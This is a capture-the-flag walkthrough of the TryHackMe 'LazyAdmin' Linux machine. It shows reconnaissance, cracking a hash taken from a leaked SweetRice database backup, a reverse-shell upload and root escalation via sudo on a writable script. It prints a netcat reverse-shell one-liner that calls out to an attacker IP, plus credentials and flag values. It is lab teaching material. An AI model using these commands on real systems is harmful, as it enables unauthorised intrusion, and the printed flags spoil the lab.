LazyAdmin
Easy linux machine to practice your skills.
November 4, 2025
•
August 19, 2025
•
Easy
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~/Documents]
└─$ sudo nmap -sV -sC -v lazyadmin.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHTTP 80
Directory Enumeration
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://lazyadmin.thm/FUZZ -e .php,.txt -r
/content
The website is running SweetRice - a simple website management.
/content Directory Enumeration
┌──(kali㉿kali)-[~/Documents]
└─$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://lazyadmin.thm/FUZZ -e .php,.txt -r/content/as
/content/changelog.txt
We identify the SweetRice version to be 1.5.0.
/content/images
There’s nothing interesting here.
/content/inc
/content/inc/cache/cache.db
┌──(kali㉿kali)-[~/Desktop]
└─$ file cache.db
cache.db: Berkeley DB (Btree, version 9, little-endian)
┌──(kali㉿kali)-[~/Desktop]
└─$ db_dump cache.db
VERSION=3
format=bytevalue
type=btree
db_pagesize=4096
HEADER=END
64625f61727261795f3265313035323534626532656366656461626163363638363864636563396236
313537353032333430392f
64625f61727261795f6336656162356265366334356438613038383465646535613536633564376433
313537353032333430392f
64625f61727261795f6364326264313238643533396638316637326562376562363331646438306332
313537353032333430392f
DATA=END/content/inc/cache/lastest.txt
This is the exact version of SweetRice.
/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
We discover a database backup in the mysql_backup folder. It’s a good idea to search for any usernames or passwords in this file:
┌──(kali㉿kali)-[~/Desktop]
└─$ cat mysql_bakup_20191129023059-1.5.1.sql | grep "user\|pass"
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',There’s a password hash:
42f749ade7f9e195bf475f37a44cafcbLet’s crack it using an online password cracker:
We successfully identify some possible credentials admin:Password123 or manager:Password123.
Dashboard Authenticated as manager
The user manager gives us the initial access.
After some dashboard enumeration, we discover a arbitrary file upload vulnerability in the Media Center.
Let’s exploit this to upload our reverse shell:
Shell as www-data
user.txt
www-data@THM-Chal:/$ cd /home
cd /home
www-data@THM-Chal:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Nov 29 2019 .
drwxr-xr-x 23 root root 4096 Nov 29 2019 ..
drwxr-xr-x 18 itguy itguy 4096 Nov 30 2019 itguy
www-data@THM-Chal:/home$ cd itguy
cd itguy
www-data@THM-Chal:/home/itguy$ ls -la
ls -la
total 148
drwxr-xr-x 18 itguy itguy 4096 Nov 30 2019 .
drwxr-xr-x 3 root root 4096 Nov 29 2019 ..
-rw------- 1 itguy itguy 1630 Nov 30 2019 .ICEauthority
-rw------- 1 itguy itguy 53 Nov 30 2019 .Xauthority
lrwxrwxrwx 1 root root 9 Nov 29 2019 .bash_history -> /dev/null
-rw-r--r-- 1 itguy itguy 220 Nov 29 2019 .bash_logout
-rw-r--r-- 1 itguy itguy 3771 Nov 29 2019 .bashrc
drwx------ 13 itguy itguy 4096 Nov 29 2019 .cache
drwx------ 14 itguy itguy 4096 Nov 29 2019 .config
drwx------ 3 itguy itguy 4096 Nov 29 2019 .dbus
-rw-r--r-- 1 itguy itguy 25 Nov 29 2019 .dmrc
drwx------ 2 itguy itguy 4096 Nov 29 2019 .gconf
drwx------ 3 itguy itguy 4096 Nov 30 2019 .gnupg
drwx------ 3 itguy itguy 4096 Nov 29 2019 .local
drwx------ 5 itguy itguy 4096 Nov 29 2019 .mozilla
-rw------- 1 itguy itguy 149 Nov 29 2019 .mysql_history
drwxrwxr-x 2 itguy itguy 4096 Nov 29 2019 .nano
-rw-r--r-- 1 itguy itguy 655 Nov 29 2019 .profile
-rw-r--r-- 1 itguy itguy 0 Nov 29 2019 .sudo_as_admin_successful
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-clipboard.pid
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-display.pid
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-draganddrop.pid
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-seamless.pid
-rw------- 1 itguy itguy 82 Nov 30 2019 .xsession-errors
-rw------- 1 itguy itguy 82 Nov 29 2019 .xsession-errors.old
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Desktop
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Documents
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Downloads
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Music
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Pictures
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Public
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Templates
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Videos
-rw-r--r-x 1 root root 47 Nov 29 2019 backup.pl
-rw-r--r-- 1 itguy itguy 8980 Nov 29 2019 examples.desktop
-rw-rw-r-- 1 itguy itguy 16 Nov 29 2019 mysql_login.txt
-rw-rw-r-- 1 itguy itguy 38 Nov 29 2019 user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt
cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}MySQL Credentials
www-data@THM-Chal:/home/itguy$ cat mysql_login.txt
cat mysql_login.txt
rice:randompassSudo Permissions
www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.plwww-data@THM-Chal:/home/itguy$ cat /home/itguy/backup.pl
cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
www-data@THM-Chal:/home/itguy$ ls -la /etc/copy.sh
ls -la /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.shWe can modify the backup.pl and execute arbitrary commands as the root user.
Shell as root
www-data@THM-Chal:/home/itguy$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.21.52 4244 >/tmp/f" > /etc/copy.sh
<sh -i 2>&1|nc 10.17.21.52 4244 >/tmp/f" > /etc/cop.sh
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.21.52 4244 >/tmp/f
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl
root.txt
root@THM-Chal:/home/itguy# cd /root
cd /root
root@THM-Chal:~# ls -la
ls -la
total 28
drwxr-x--- 4 root root 4096 aug 19 14:34 .
drwxr-xr-x 23 root root 4096 nov 29 2019 ..
lrwxrwxrwx 1 root root 9 nov 29 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 oct 22 2015 .bashrc
drwx------ 2 root root 4096 feb 27 2019 .cache
drwxr-xr-x 2 root root 4096 nov 29 2019 .nano
-rw-r--r-- 1 root root 148 aug 17 2015 .profile
-rw-r--r-- 1 root root 38 nov 29 2019 root.txt
root@THM-Chal:~# cat root.txt
cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}